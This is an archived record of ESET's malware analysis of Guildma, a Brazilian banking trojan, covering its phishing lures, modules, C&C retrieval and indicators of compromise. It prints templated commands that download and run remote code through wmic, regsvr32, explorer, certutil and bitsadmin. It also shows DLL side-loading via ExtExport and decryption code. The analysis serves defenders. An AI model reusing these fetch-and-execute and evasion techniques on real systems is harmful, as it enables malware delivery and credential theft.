{
	"id": "e66ac9c9-1bc9-4f6e-b6c8-b80a11d56e0c",
	"created_at": "2026-04-06T00:09:36.894456Z",
	"updated_at": "2026-04-10T13:11:31.25539Z",
	"deleted_at": null,
	"sha1_hash": "fd317d24cfe27e5226b2854dc62159721c2bc304",
	"title": "Guildma: The Devil drives electric",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 658605,
	"plain_text": "Guildma: The Devil drives electric\r\nBy ESET Research\r\nArchived: 2026-04-05 13:13:51 UTC\r\nIn this blogpost, we will examine Guildma (also known as Astaroth, a powerful demon), a highly prevalent Latin\r\nAmerican banking trojan. This Brazil-targeting trojan, written in Delphi, boasts some innovative execution and attack\r\ntechniques. We will describe the most recent version, highlighting the most notable changes made since the middle of\r\n2019 when an avalanche of articles about Guildma was published in response to its largest campaign to date.\r\nCharacteristics\r\nGuildma is a Latin American banking trojan that targets Brazil exclusively. Based on our telemetry — as well as the\r\npublic attention it has received — we believe it to be the most impactful and advanced banking trojan in the region.\r\nBesides targeting financial institutions, Guildma also attempts to steal credentials for email accounts, e‑shops and\r\nstreaming services, and affects at least ten times as many victims as other Latin American banking trojans already\r\ndescribed in this series. It uses innovative methods of execution and sophisticated attack techniques.\r\nUnlike the Latin American banking trojans we have described previously, Guildma does not store the fake pop-up\r\nwindows it uses within the binary. Instead, the attack is orchestrated by its C\u0026C server. This gives the authors greater\r\nflexibility to react to countermeasures implemented by the targeted banks.\r\nGuildma implements the following backdoor functionalities:\r\nTaking screenshots\r\nCapturing keystrokes\r\nEmulating keyboard and mouse\r\nBlocking shortcuts (such as disabling Alt + F4 to make it harder to get rid of fake windows it may display)\r\nDownloading and executing files\r\nRestarting the machine\r\nGuildma is very modular. At the time of writing, it consists of 10 modules, not including distribution chain stages. The\r\nfunctionality of individual modules will be discussed later.\r\nEvolution of distribution chains\r\nOur telemetry indicates Guildma spreads exclusively through spam emails with malicious attachments. Here are a few\r\nexamples from a campaign from the middle of November 2019.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 1 of 16\n\nFigure 1. Spam email example (translation: \"Hello, please explain these photos to me. I'm waiting for your\r\nexplanation!\")\r\nFigure 2. Spam email example (translation: \"Dear member of consórcio, attached is the proof of bid no. 75432.\")\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 2 of 16\n\nFigure 3. Spam email example (translation: \"Good morning, I am sending the proof of transfer - DOC. Citibank\")\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 3 of 16\n\nFigure 4. Spam email example. Fake invoice reminder stating that a payment is due the day after tomorrow and that the\r\npayment may take up to 72 hours to be processed.\r\nOne of the defining characteristics of Guildma’s distribution chains is using tools already present on the system, often in\r\nnew and unusual ways.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 4 of 16\n\nAnother characteristic is reusing techniques. New techniques are added every once in a while, but for the most part, the\r\ndevelopers seem to simply reuse techniques from older versions.\r\nFigure 5. Distribution chain of Guildma in version 150\r\nFigure 5 shows the distribution chain for version 150, but the structure of Guildma’s distribution chains is very dynamic.\r\nFor instance, in previous versions, the malicious LNK file shown in Figure 5 was not embedded in a ZIP archive, or an\r\nSFX RAR archive containing an MSI installer was used instead. Also, there used to be another JScript stage whose sole\r\npurpose was downloading and executing the final JScript stage; there have been too many changes overall to fit into this\r\narticle. In fact, the only part that has mostly stayed the same is the final JScript stage.\r\nUsing data from our long-term, in-depth tracking of this family, we have compiled a very good picture of Guildma’s\r\nactivity.\r\nFigure 6 shows all ESET detections of Guildma’s first-stage component. As you can see, the campaigns were ramping up\r\nslowly until a massive campaign in August 2019, when we were seeing up to 50,000 samples per day. This campaign\r\nwent on for almost two months and accounted for more than double the amount of detections we had seen in the 10\r\nmonths prior.\r\nFigure 6. First stage Guildma detections since October 2018\r\nFollowing is a summary of some of the more interesting techniques used in the last 14 months.\r\nExecution of the JScript stage\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 5 of 16\n\nOver the last year, Guildma has used several methods of executing the JScript stages of its distribution chain. At the end\r\nof 2018, Guildma was hiding its code in eXtensible Stylesheet Language (.xsl) files and using wmic.exe to download and\r\nexecute them:\r\nwmic.exe \u003cwmic query\u003e /format:\"\u003cURL\u003e\"\r\nIt then briefly moved on to using regsvr32.exe and scrobj.dll to download a JScript-implemented COM object and\r\nexecute its registration routine (which contained the malicious code):\r\nregsvr32.exe /s /n /u /i:\u003cURL\u003e scrobj.dll\r\nMost recently, the authors started abusing Windows Explorer to execute the JScript stage. This attack relies on the fact\r\nthat Windows Explorer will try to open any file passed to it on the command line with its associated program and the fact\r\nthat the default association for .js files is the Microsoft Windows Script Host. The “script” passed to Windows Explorer\r\nis a single command whose purpose is to download and execute the actual JScript stage:\r\necho GetObject('script:\u003cURL\u003e') \u003e \u003cfile\u003e.js | explorer.exe \u003crandom switches\u003e \u003cfile\u003e.js\r\nExecution of the binary modules\r\nMethods of running the PE modules are no less diverse.\r\nWhen we started tracking Guildma, it was abusing Avast’s aswRunDll.exe to launch the first binary stage, with\r\nregsvr32.exe as a failover for computers where Avast’s products weren’t installed. The use of aswRunDll.exe was then\r\ndropped, leaving regsvr32.exe as the sole method of execution. After a brief period of using rundll32.exe, Guildma\r\nswitched to its current execution method — ExtExport.exe.\r\nExtExport.exe is an undocumented component of Microsoft Internet Explorer used for exporting bookmarks from\r\nMozilla Firefox and 360 Secure Browser, and can be abused for DLL Side-Loading. When the following command is\r\nexecuted, mozcrt19.dll, mozsqlite3.dll, and sqlite3.dll are loaded from the folder specified on the command line:\r\nC:\\Program Files\\Internet Explorer\\ExtExport.exe \u003cfolder\u003e \u003cdummy 1\u003e \u003cdummy 2\u003e\r\nTo abuse this, you would normally drop the DLL to be loaded as one of the above-mentioned files; Guildma uses all\r\nthree.\r\nDownloading the binary modules\r\nGuildma has also utilized a couple of different ways to download the binary modules. The first version was using\r\ncertutil.exe copied to certis.exe (presumably to evade detection):\r\ncertis.exe -urlcache -split -f \"\u003cURL\u003e\" \"\u003cdestination path\u003e\"\r\nThe authors then switched to BITSAdmin — the Microsoft Background Intelligent Transfer Service management tool —\r\nand are still using it at the time of writing:\r\nbitsadmin.exe /transfer \u003crandom number\u003e /priority foreground \u003cURL\u003e \u003cdestination\u003e\r\nFor a couple months, the binary modules were base64-encoded and hosted on Google Cloud. In that time, Guildma was\r\nusing both BITSAdmin and certutil — BITSAdmin to download the modules and certutil to decode them.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 6 of 16\n\nOther changes\r\nGuildma uses strange, non-descriptive variable and function names. When we started tracking Guildma, the names, while\r\nnonsensical, were clearly man-made (e.g. “radador” for the random number function or “Bxaki” for the download\r\nfunction). In June 2019 they were all changed to random-looking names (e.g. “bx021” and “mrc430”). At first, we\r\nthought the authors implemented some kind of an automated script obfuscator, but it turned out to be a onetime change\r\nand the names have remained the same since.\r\nA relatively new addition is the age-old technique of using ADS (Alternate Data Streams) to store the binary modules.\r\nAll the modules are now stored as ADS of a single file (e.g. “desktop.ini:nauwuygiaa.jpg”,\r\n“desktop.ini:nauwuygiab.jpg”, etc.).\r\nVersion history\r\nGuildma has seemingly gone through many versions during its development, but there was usually very little\r\ndevelopment between versions — due to its clunky architecture utilizing hardcoded configuration values, for the most\r\npart the authors have to recompile all the binaries for every new campaign. A job that is clearly not completely\r\nautomated, since there has often been a significant delay between updating the version number in the scripts and in the\r\nbinaries.\r\nIn this article, we cover version 150, but since we started writing, two more versions have been released. They contain no\r\nsubstantial change in functionality or distribution, supporting our claims about Guildma’s development cycle.\r\nThe final stage of the distribution chain used to contain a version name (and even before that, it used to download said\r\nname along with the binary modules), but it has been (presumably) permanently replaced with a simple “xXx” since\r\nversion 148.\r\nTable 1 summarizes all the versions released since we started tracking Guildma actively in October 2018. Looking at the\r\nversion strings, we get the feeling the author is passionate about ecology and fast cars.\r\nTable 1. Guildma version history\r\nFirst seen Version number Version name Version prefix\r\n2018-09-18 131 131_SUPER_Tesla marxvxinhhm\r\n2018-10-31 132 132_ULTRA_Tesla srsysddirrx\r\n2018-11-28 133 133_TORRE_DE_Tesla mxgetronicosxy\r\n2018-11-29 134 134_MAXX_TESLAs dwqiopawsamazon\r\n2018-12-03 135 135_MOAB_TESLAs lu769tsla\r\n2018-12-13 136 136_KRAKEN_TESLAs lrdsnhrxxfery\r\n2019-02-06 137 137_RAPTOR_TESLAs rakpat0rpcack\r\n2019-03-21 138 138_RAPTOR_TESLAs_ hillwd763free\r\n2019-05-20 139 139_TESLA_ falxconxrenw\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 7 of 16\n\nFirst seen Version number Version name Version prefix\r\n2019-06-03 140 140_ASTH_ valehraysystqx\r\n2019-06-24 141 141_T3SL4S_ ayt3ese4xw\r\n2019-07-17 142 142_T3SL4S_ halawxtz\r\n2019-08-09 143 143_T3SL4S_ asmonnwqk\r\n2019-08-26 144 144_MULT1T3SL4S_ daffsyshqy\r\n2019-09-26 145 145_MULT1T3SL4S_ landoqeahjky\r\n2019-10-16 146 146_MULT1T3SL4S_ valkanxpca\r\n2019-11-04 147 147_MULT1T3SL4S_ koddsuffy\r\n2019-11-19 148 xXx lpquayevvt\r\n2019-11-22 149 #rowspan# nauwuygia\r\n2019-12-13 150 #rowspan# andrealfo\r\n2020-01-14 151 #rowspan# balberith\r\n2020-02-05 152 #rowspan# masihaddajjal\r\nModule overview\r\nAs mentioned earlier, Guildma is very modular; the structure of its modules seems to be mostly constant. In this section,\r\nwe will briefly describe the functionality of each module.\r\nAll module names are composed of a shared, version-dependent prefix and a module-specific suffix. In Table 2, the\r\nversion-dependent prefix is andrealfo.\r\nTable 2. Guildma module overview\r\nURL filename Filesystem filename Module\r\nandrealfohh1a.dll.zip andrealfo64.~ Main module loader 1 (part 1)\r\nandrealfohh1b.dll.zip #rowspan# Main module loader 1 (part 2)\r\nandrealfoxa.gif.zip andrealfoxa.gif Main module injector (part 1)\r\nandrealfoxb.gif.zip andrealfoxb.gif Main module injector (part 2)\r\nandrealfoxc.gif.zip andrealfoxc.gif Main module injector (part 3)\r\nandrealfogx.gif.zip andrealfogx.gif Main module loader 2\r\nandrealfog.gif.zip andrealfog.gif Main module\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 8 of 16\n\nURL filename Filesystem filename Module\r\nandrealfoc.jpg.zip andrealfoc.jpg Contacts stealer and form grabber module\r\nandrealfodwwn.gif.zip andrealfodwwn.gif RAT module (DLL)\r\nandrealfodx.gif.zip andrealfodx.gif RAT module (EXE)\r\nandrealfoa.jpg.zip andrealfoa.jpg MailPassView\r\nandrealfob.jpg.zip andrealfob.jpg WebBrowserPassView\r\nandrealfoi.gif.zip andrealfoi.gif JScript dropper module\r\nWith the exception of the main module loader 1 (*64.~) and the main module injector (*xa.gif, *xb.gif and *xc.gif), all\r\nthe modules are encrypted with a simple XOR cipher using a repeating 32-byte key. The key is generated from a 32-bit\r\nseed using the algorithm shown in Figure 7. The seed value is obfuscated in the binaries to prevent simple extraction (see\r\nFigure 8).\r\nkey = bytearray ();\r\nfor i in range ( 32 ):\r\nkey . append ( seed \u0026 0xff );\r\nseed \u003e\u003e= 1;\r\nFigure 7. Key generation algorithm\r\nFigure 8. Seed obfuscation in the binary\r\nThree modules communicate with a C\u0026C server: Main module, RAT module, and Contacts stealer and form grabber. The\r\ncommunication is done over HTTP(S) using a combination of base64 and various simple custom encryption algorithms\r\nto protect the data being transferred.\r\nIn the next section, we describe how the C\u0026C server address is obtained.\r\nMain module loader 1 (*64.~)\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 9 of 16\n\nThis is the first binary stage of the chain. The file is a DLL downloaded in two parts, which are concatenated by the\r\nprevious JScript stage. It loads the three files comprising the next stage loader (*xa.gif, *xb.gif and *xc.gif), concatenates\r\nthem, maps the resulting PE file into its own address space and executes it.\r\nLoading a PE file is a relatively complex process, so the authors used the BTMemoryModule open-source library for this\r\npurpose.\r\nMain module injector (*xa.gif + *xb.gif + *xc.gif)\r\nThis module loads the next stage (*gx.gif) from disk and decrypts it. It then runs the first existing executable from the\r\nfollowing list and injects the decrypted payload into it.\r\nC:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe\r\nC:\\Program Files\\Diebold\\Warsaw\\unins000.exe *\r\nC:\\Windows\\SysWOW64\\userinit.exe\r\nC:\\Windows\\System32\\userinit.exe\r\n*\r\n An application, popular in Brazil, to protect access to online banking.\r\nMain module loader 2 (*gx.gif)\r\nThe last loader stage is very simple and seems to needlessly duplicate the functionality of main module loader 1. It loads\r\nand decrypts the main module (*g.gif), maps it into its own memory space and executes it.\r\nMain module (*g.gif)\r\nGuildma’s main module orchestrates all the remaining modules. Its implementation is deceptively complex, using\r\ncountless timers and events, but its functionality is actually relatively simple. It contains legacy code that is not being\r\nused anymore as well as pre-production code that is not being used yet.\r\nOn loading, this module checks if it is running in a sandboxed environment (for example, by examining the computer\r\nname and system disk volume ID), if there are other running instances of itself (based on window names) and if the\r\nsystem locale is different from Portuguese. If any check reveals the system is uninteresting or already compromised by\r\nGuildma, the malware terminates.\r\nOtherwise, the module then collects information from the system (computer name, which security software is being used,\r\ninstalled programs…) and establishes contact with the C\u0026C server. It then starts monitoring interesting events, mainly\r\nwhen certain applications are launched or online banking sites opened, and executing appropriate actions (e.g. taking\r\nscreenshots, preventing the user from closing the window by intercepting keyboard shortcuts, launching the RAT\r\nmodule, and so on).\r\nThe module also implements backdoor commands whose functionality largely overlaps with the RAT module.\r\nContact stealer and form grabber (*c.jpg)\r\nThis module has two functions — gathering email addresses and form data from webpages.\r\nEmail addresses are obtained from desktop email clients (such as Microsoft Outlook, Thunderbird and The Bat!) by\r\nparsing their address books as well as the emails themselves.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 10 of 16\n\nThe form grabber uses Windows COM technology to interact with Internet Explorer. It waits until a targeted site is\r\nopened (mostly Brazilian webmails, e-shops and payment gateways) and then logs the user out, forcing the victim to\r\ninput credentials. It then retrieves the DOM and looks for important input field values (such as usernames, passwords\r\nand credit card numbers).\r\nRAT module (*dwwn.gif, *dx.gif)\r\nThe RAT module comes in two functionally identical compilations — DLL (*dwwn.gif) and EXE (*.dx.gif).\r\nIt implements download and execute functionality, can take screenshots, emulate keyboard and mouse input, and restart\r\nthe computer.\r\nMost Latin American banking trojans display fake pop-up windows based on monitoring the active window’s name.\r\nThese windows are usually stored in the binary. We have not found such code in Guildma, but the RAT module contains\r\na Delphi form implementing a simple web browser. Since it is also executed based on the active window’s name, we\r\nbelieve this form is used for displaying fake dialogs to the user.\r\nMailPassView (*a.jpg) and BrowserPassView (*b.jpg)\r\nThese are freeware tools from Nirsoft for extracting saved credentials from popular email clients and web browsers\r\nrespectively. Since Nirsoft has removed support for quiet operation (output to file, with no GUI) from newer versions to\r\ncurb the abuse of these tools by malware, Guildma’s authors are using older versions that had those features. The same\r\ntools are also leveraged by Mispadu, except Mispadu is using newer versions with quiet operation support patched back\r\nin.\r\nJScript dropper module (*i.gif)\r\nThis module drops and executes (using cscript.exe) a JScript file. The script consists of two parts — the first part is\r\nstored as one long encrypted string, while the second part is assembled from many short strings (some encrypted and\r\nsome in plaintext). Worthy of note is the fact that strings in the dropped JScript file are encrypted by this dropper module\r\nwith a randomly generated key, so they are present in the clear in the dropper.\r\nThe script executes the following actions:\r\nDisables UAC\r\nDisables EXE signature checking\r\nDisables Windows Defender\r\nCreates a firewall rule disabling network access for\r\nC:\\Program Files\\AVAST Software\\Avast\\Setup\\avast.setup\r\nDisables wsddntf driver (Diebold Warsaw GAS Tecnologia — the banking access protection software introduced\r\nearlier)\r\nAdds a firewall exception for files used as injection targets\r\nC:\\Program Files\\Diebold\\Warsaw\\unins000.exe\r\nC:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe\r\nWe believe this module may still be in development as we have never observed it on our test machines dropping the\r\nscript.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 11 of 16\n\nNew developments (since mid-2019)\r\nNew C\u0026C retrieval\r\nIn version 142, a new way of distributing C\u0026C servers, abusing YouTube and Facebook profiles, was implemented.\r\nHowever, the authors stopped using Facebook almost immediately and, at the time of writing, are fully relying on\r\nYouTube. This is similar to Casbaneiro, but a bit cruder. While Casbaneiro was hiding the data in video descriptions and\r\nobfuscating it as a part of a URL, Guildma simply places the data in the channel description. The start and end of the\r\nencrypted C\u0026C addresses is delimited by “|||”. The data in between is base64 encoded and encrypted using Mispadu’s\r\nstring encryption algorithm. This is now the primary method of retrieving C\u0026C servers; the old method (described by\r\nAvast) is still present as a backup.\r\nFigure 9. Encrypted Guildma C\u0026C server domains stored on YouTube\r\nModules added and removed\r\nThe previously described JScript dropper module was added in version 145. Conversely, in version 139, Guildma\r\ndropped two other modules present in older versions — mass mailer (*f.jpg) and its loader (*e.jpg). In the next few\r\nversions, these modules were still accessible under the expected names (\u003cversion prefix\u003ee.jpg and \u003cversion prefix\u003ef.jpg)\r\nfrom the same server as the other modules. This leads us to believe these modules are still being developed, but are now\r\nonly distributed as needed, presumably using the download and execute backdoor command.\r\nNew string encryption\r\nThe JScript dropper module brought with it a new string encryption algorithm. A variant of this algorithm (shown in\r\nFigure 10) was propagated into other modules in version 147.\r\ndef decrypt ( ct, key ):\r\n# stage 1\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 12 of 16\n\nct = unhexlify ( ct );\r\nlast = ct [ 0 ];\r\ns = bytearray ( ct [ 1 : ] );\r\nfor i in range ( len ( s ) ):\r\nx = s [ i ] ^ key [ i % len ( key ) ];\r\nif last \u003e x:\r\nx += 0xff;\r\nx -= last;\r\nlast = s [ i ];\r\ns [ i ] = x;\r\n# stage 2 - reverse string\r\ns = s [::-1];\r\n# stage 3 - c = not ( c - 10 )\r\ns = \"\" . join ( [ chr ( ( ~( c - 10 ) ) \u0026 0xff ) for c in s ] );\r\n# stage 4 - Base25 decode and key subtraction\r\nk = ord ( s [ 0 ] ) - 65;\r\not = \"\";\r\nfor i in range ( 1, len ( s ), 2 ):\r\not += chr ( ( ord ( s [ i ] ) - 65 ) * 25 + ord ( s [ i + 1 ] ) - 65 - k - 100 );\r\nreturn ot;\r\nFigure 10. New string encryption algorithm\r\nOriginally, Guildma was using the same string encryption as Casbaneiro. The new algorithm has four stages and as you\r\ncan see, the original string encryption algorithm is still used as the first stage. Also of note is the fact that the fourth stage\r\nis once again using Mispadu’s encryption algorithm.\r\nIn version 148 Guildma implemented a string table; all strings are decrypted at the beginning of execution and accessed\r\nfrom the table when needed.\r\nRemoval of international targets\r\nIn version 138, Guildma added capability to target institutions (mainly banks) outside of Brazil. Despite that, we have\r\nobserved no international campaigns; the campaigns hosting files on Cloudflare Workers’ infrastructure even went as far\r\nas to block any downloads from non-Brazilian IPs. In fact, in the last 14 months we haven’t seen any campaign targeting\r\nusers outside of Brazil.\r\nFinally, in version 145, the capability to target institutions outside of Brazil was removed. Based on these facts, we\r\nbelieve it was merely an in-development feature which ended up being scrapped.\r\nConclusion\r\nIn this part of the series, we have talked about Guildma, the most prevalent Latin American banking trojan we have seen.\r\nWe have shown its rich historical developments while focusing on the most recent variant.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 13 of 16\n\nGuildma once again shares the prevailing characteristics of a Latin American banking trojan. It is written in Delphi,\r\ntargets the region, implements backdoor functionality, splits its functionality into many modules and abuses legitimate\r\ntools.\r\nGuildma also shares interesting common features with families described earlier in this series. Namely, its current\r\nencryption algorithm combines the ones used by Casbaneiro and Mispadu.\r\nFor any inquiries, contact us at threatintel@eset.com. Indicators of Compromise can also be found in our GitHub\r\nrepository.\r\nIndicators of Compromise (IoCs)\r\nHashes\r\nSHA-1 Description ESET Detection name\r\n45c58bc40768dce6a6c611e08fd34c62441aa776 Main module loader 1 Win32/Spy.Guildma.BM\r\n861f20b0dcc55f94b4c43e4a7e77f042c21506cf Main module injector Win32/Spy.Guildma.BJ\r\n37fd19b1ab1dcc25e07bc96d4c02d81cf4edb8a1 Main module loader 2 Win32/Spy.Guildma.Q\r\na7b10b8de2b0ef898cff31fa2d9d5cbaae2e9d0d Main module Win32/Spy.Guildma.BS\r\n4f65736a9d6b94b376c58b3cdcb49bbd295cd8cc\r\nContacts stealer and\r\nform grabber\r\nWin32/Spy.Guildma.D\r\n6c9304c5862d4e0de1c86d7ae3764f5e8358daff RAT module (DLL) Win32/Spy.Guildma.BR\r\n89fbffe456de850f7abf4f97d3b9da4bad6afb57 RAT module (EXE) Win32/Spy.Guildma.BR\r\naf0d495ecc3622b14a40ddcd8005873c5ddc3a2d MailPassView Win32/PSWTool.MailPassView.E\r\n92bcf54079cbba04f584eac4486473c3abdd88cd WebBrowserPassView Win32/PSWTool.WebBrowserPassView.E\r\na2048f435f076988bf094274192a196216d75a5f\r\nJScript dropper\r\nmodule\r\nWin32/Spy.Guildma.BP\r\nFilenames\r\nC:\\Users\\Public\\Libraries\\qlanl\\*\r\nStartup link\r\nLocation\r\n%APPDATA%\\Microsoft\\Programs\\StartUp\\reiast%USERNAME%%COMPUTERNAME%.lnk\r\nTargets\r\nC:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe\r\nC:\\Program Files\\Internet Explorer\\ExtExport.exe\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 14 of 16\n\nArgs\r\n\u003cinstall dir\u003e \u003crand\u003e \u003crand\u003e\r\n(where \u003crand\u003e is a random, 5 to 9 character long string generated from the alphabet\r\nqwertyuiop1lgfdsas2dfghj3zcvbnmm)\r\nC\u0026C servers\r\nhttps://www.zvatrswtsrw[.]ml\r\nhttps://xskcjzamlkxwo[.]gq\r\nhttps://www.vhguyeu[.]ml\r\nhttps://www.carnataldez[.]ml\r\nhttps://www.movbmog[.]ga\r\nhttps://iuiuytrytrewrqw[.]gq\r\nhttps://www.gucinowertr[.]tk\r\nhttps://equilibrios[.]ga\r\nhttps://www.clooinfor[.]cf\r\nhttps://ambirsr[.]tk\r\nhttps://dbuhcbudyu[.]tk\r\nhttps://nvfjvtntt[.]cf\r\nhttp://whia7g.acquafufheirybveru[.]online\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nInitial Access T1193 Spearphishing Attachment\r\nGuildma distribution chains start with a malicious\r\nemail attachment.\r\nExecution\r\nT1073 Rundll32\r\nGuildma utilizes rundll32.exe to execute its binary\r\nmodules.\r\nT1047\r\nWindows Management\r\nInstrumentation\r\nGuildma abuses WMIC.exe to execute some of its\r\ndistribution chain stages.\r\nPersistence T1060\r\nRegistry Run Keys / Startup\r\nFolder\r\nGuildma ensures persistence by creating a LNK file in\r\nthe %STARTUP% folder.\r\nDefense\r\nEvasion\r\nT1197 BITS Jobs BITSAdmin.exe is used to download binary modules.\r\nT1089 Disabling Security Tools Guildma disables Windows Defender.\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nThe majority of Guildma modules need to be decrypted\r\nafter downloading.\r\nT1073 DLL Side-Loading Guildma abuses ExtExport.exe for DLL Side-Loading.\r\nT1096 NTFS File Attributes Guildma utilizes ADS to hide its modules on disk.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 15 of 16\n\nTactic ID Name Description\r\nT1055 Process Injection\r\nGuildma utilizes process injection when executing its\r\nmodules.\r\nT1064 Scripting\r\nGuildma implements its distribution chain stages in\r\nvarious scripting languages (mainly JScript).\r\nT1220 XSL Script Processing\r\nGuildma utilizes XSL script(s) in its distribution\r\nchains.\r\nCredential\r\nAccess\r\nT1081 Credentials in Files\r\nGuildma extracts credentials stored by web browsers\r\nand email clients in files.\r\nT1214 Credentials in Registry\r\nGuildma extracts credentials stored by web browsers\r\nand email clients in Windows Registry.\r\nDiscovery\r\nT1083 File and Directory Discovery\r\nGuildma uses presence of certain files to determine\r\nwhether banking and security tools are installed.\r\nT1010\r\nApplication Window\r\nDiscovery\r\nGuildma uses window discovery to find and terminate\r\nolder versions of itself and to detect when interesting\r\nprograms (e.g. banking applications or web browsers)\r\nare running.\r\nT1063 Security Software Discovery\r\nGuildma detects the presence of several security\r\nproducts.\r\nT1082\r\nSystem Information\r\nDiscovery\r\nGuildma collects OS version and bitness, computer\r\nname and system locale.\r\nT1497\r\nVirtualization/Sandbox\r\nEvasion\r\nGuildma uses directory names, computer names,\r\nvolume IDs, and existence of named objects to detect\r\nsandboxes and virtualized environments.\r\nCollection T1113 Screen Capture Guildma is capable of taking screenshots.\r\nCommand\r\nand Control\r\nT1024\r\nCustom Cryptographic\r\nProtocol\r\nNew C\u0026C addresses are encrypted using custom\r\nencryption algorithms.\r\nExfiltration T1041\r\nExfiltration Over Command\r\nand Control Channel\r\nGuildma uploads screenshots and log files to the C\u0026C\r\nserver.\r\nSource: https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/"
	],
	"report_names": [
		"guildma-devil-drives-electric"
	],
	"threat_actors": [
		{
			"id": "bc289ba8-bc61-474c-8462-a3f7179d97bb",
			"created_at": "2022-10-25T16:07:24.450609Z",
			"updated_at": "2026-04-10T02:00:04.996582Z",
			"deleted_at": null,
			"main_name": "Avalanche",
			"aliases": [],
			"source_name": "ETDA:Avalanche",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434176,
	"ts_updated_at": 1775826691,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fd317d24cfe27e5226b2854dc62159721c2bc304.pdf",
		"text": "https://archive.orkl.eu/fd317d24cfe27e5226b2854dc62159721c2bc304.txt",
		"img": "https://archive.orkl.eu/fd317d24cfe27e5226b2854dc62159721c2bc304.jpg"
	}
}